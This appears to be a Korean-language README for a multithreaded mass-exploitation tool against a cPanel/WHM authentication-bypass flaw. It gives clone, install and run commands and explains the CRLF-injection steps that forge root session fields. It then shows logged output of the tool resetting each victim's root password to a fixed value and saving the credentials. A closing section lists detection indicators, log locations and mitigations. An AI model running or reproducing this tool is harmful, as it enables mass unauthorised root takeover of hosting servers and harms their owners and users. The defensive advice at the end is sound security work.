
cPanel/WHM의 CVE-2026-41940을 위한 대량 스캐너 및 대규모 익스플로잇 도구로, 자동화된 대상 검증과 고속 멀티스레드 실행을 위해 설계되었습니다.
CVE-2026-41940은 WHM/cPanel의 심각한 인증 우회 취약점으로, 공격자가 유효한 자격 증명 없이 인증을 우회하고 서버에 대한 루트 액세스 권한을 얻을 수 있게 합니다. 이 취약점은 세션 처리 메커니즘의 CRLF 인젝션을 악용하여 악성 세션 매개변수를 주입합니다.
이 도구는 여러 대상을 동시에 테스트하기 위한 멀티스레딩 지원, 지능적인 성공 감지 및 잘못된 대상의 자동 필터링 기능을 갖춘 대량 익스플로잇 기능을 제공합니다.
| 기능 | 설명 |
|---|---|
| ✅ 대량 익스플로잇 | 목록 파일에서 여러 대상을 스캔하고 익스플로잇 |
| 🚀 멀티스레딩 | 더 빠른 스캔을 위한 구성 가능한 스레드 수 (기본값: 15) |
| 🔐 자동 비밀번호 변경 | 성공적인 익스플로잇 시 루트 비밀번호를 Jenderal92로 변경 |
| 🛡️ 지능형 성공 감지 | 다양한 WHM API 응답 형식을 자동으로 감지 |
| ⚠️ 라이선스 오류 필터링 | 잘못된/읽을 수 없는 라이선스 오류가 있는 대상 제외 |
| 📝 구조화된 출력 | 확인된 성공 건만 `domain:port |
| 🛡️ SSL/TLS 지원 | 자체 서명 인증서 자동 처리 |
| 🔄 세션 관리 | 자동 세션 추출, 쿠키 주입 및 토큰 처리 |
| ⏱️ 타임아웃 제어 | 구성 가능한 연결 타임아웃 (기본값: 15초) |
| 🔍 사전 연결 확인 | 익스플로잇 시도 전 포트 가용성 확인 |
| 📊 실시간 진행 상황 | 각 익스플로잇 단계별 상세 진행 상황 표시 |
pip install requests urllib3 futures
또는 requirements.txt 사용:
requests==2.27.1
urllib3==1.26.18
futures==3.4.0
# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940
# Install dependencies
pip install -r requirements.txt
# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py
각 줄에 대상 하나씩 포함된 targets.txt 파일을 생성합니다:
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com
참고: 포트
2087은 WHM 기본 포트입니다. 지정하지 않으면 자동으로 포트 2087을 사용합니다. HTTP/HTTPS 접두사가 없으면 자동으로 추가됩니다.
python2 CVE-2026-41940.py targets.txt
# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5
# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20
# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10
# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30
| 인수 | 설명 | 기본값 | 필수 |
|---|---|---|---|
list_file | 대상 목록이 포함된 파일 (줄당 하나) | - | ✅ 예 |
--threads | 동시 스레드 수 | 15 | ❌ 아니요 |
--hostname | 모든 대상의 Host 헤더 재정의 | 자동 감지 | ❌ 아니요 |
--timeout | 연결 타임아웃(초) | 15 | ❌ 아니요 |
res.txt)성공이 확인된 익스플로잇만 저장됩니다. 라이선스 오류, 비밀번호 변경 실패 또는 연결 문제가 있는 대상은 자동으로 제외됩니다.
형식:
domain:port|root|Jenderal92
출력 예시:
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92
다음 대상은 res.txt에 저장되지 않습니다:
Cannot Read License File)$ python2 CVE-2026-41940.py targets.txt --threads 10
CVE-2026-41940 bypass authentication - Mass Exploit
[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED
==================================================
[*] Checking target: 127.0.0.1
Original input: 127.0.0.1
Normalized: https://127.0.0.1:2087
Port 2087: OPEN
Testing connection... OK (HTTP 200)
[0] hostname = example.com
[1] minting a preauth session...
session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.118.0.13"}
[*] attempting to change the root password
passwd -> HTTP 200
{
"data": {
"app": ["system"]
},
"metadata": {
"output": {
"raw": "Password for \"root\" has been changed."
},
"reason": "Password changed for user \"root\".",
"version": 1,
"command": "passwd",
"result": 1
}
}
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!
[✓] SUCCESS & SAVED: 127.0.0.1:2087
Saved to res.txt: 127.0.0.1:2087|root|Jenderal92
==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4
[+] Results saved to res.txt
Successfully exploited targets (password changed to Jenderal92):
✓ 127.0.0.1:2087
이 익스플로잇은 지능적인 검증을 갖춘 4가지 주요 단계로 구성됩니다:
[1] minting a preauth session...
/login/?login_only=1에 POST 요청 전송whostmgrsession 쿠키 획득,<obhex> 부분을 제거하여 세션 베이스 추출[2] sending the CRLF injection...
Authorization: Basic 헤더로 GET 요청 전송root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
\r\n) 문자가 가짜 세션 매개변수를 주입cp_security_token이 포함된 Location 헤더로 응답[3] firing do_token_denied to propagate...
/scripts2/listaccts 엔드포인트에 접근do_token_denied 메커니즘 트리거[4] verifying we're WHM root...
/json-api/version에 접근하여 루트 수준 접근 권한 검증/json-api/passwd API를 호출하여 루트 비밀번호를 Jenderal92로 변경{"metadata": {"result": 1}} (cPanel v11.118+){"status": 1} (이전 버전){"result": [{"status": 1}]} (레거시 형식)이 도구는 다음을 자동으로 제외합니다:
{"status": 0, "statusmsg": "Cannot Read License File"}| 지표 | 설명 |
|---|---|
비정상적인 whostmgrsession 쿠키 | 적절한 인증 없이 나타나는 비정상적인 쿠키 패턴 |
| 헤더의 CRLF 문자 | HTTP 헤더에서 \r\n 시퀀스 감지 |
/scripts2/listaccts 접근 | 이 경로에 대한 무단 접근 |
비밀번호 Jenderal92 | 이 특정 비밀번호를 사용한 성공적인 로그인 |
cpsess 토큰 유출 | Location 헤더에 보이는 보안 토큰 |
| 실패 후 성공한 로그인 | 잘못된 비밀번호로 /login/?login_only=1에 POST 후 권한 있는 접근 |
# WHM access log
/usr/local/cpanel/logs/access_log
# cPanel error log
/usr/local/cpanel/logs/error_log
# Authentication log
/var/log/secure
# System messages
/var/log/messages
WHM/cPanel을 최신 패치 버전으로 즉시 업데이트
/usr/local/cpanel/scripts/upcp
모든 계정, 특히 루트에 대해 2단계 인증(2FA) 활성화
WHM → Security Center → Two-Factor Authentication
IP 화이트리스트로 WHM 접근 제한
WHM → Security Center → Host Access Control
의심스러운 패턴이 있는지 액세스 로그 정기적으로 모니터링
tail -f /usr/local/cpanel/logs/access_log | grep -E "(listaccts|passwd|login_only)"
손상이 의심되면 모든 비밀번호 변경
방화벽 규칙을 사용하여 포트 2087 접근 제한
# Allow only trusted IPs
iptables -A INPUT -p tcp --dport 2087 -s YOUR_TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 2087 -j DROP
# Or use CSF/LFD firewall
csf -a YOUR_TRUSTED_IP
CRLF 인젝션 시도를 감지하는 WAF 규칙 구현
WHM/cPanel 설치에 대한 정기적인 보안 감사
echo "https://myserver.com:2087" > my_server.txt
python2 CVE-2026-41940.py my_server.txt --threads 1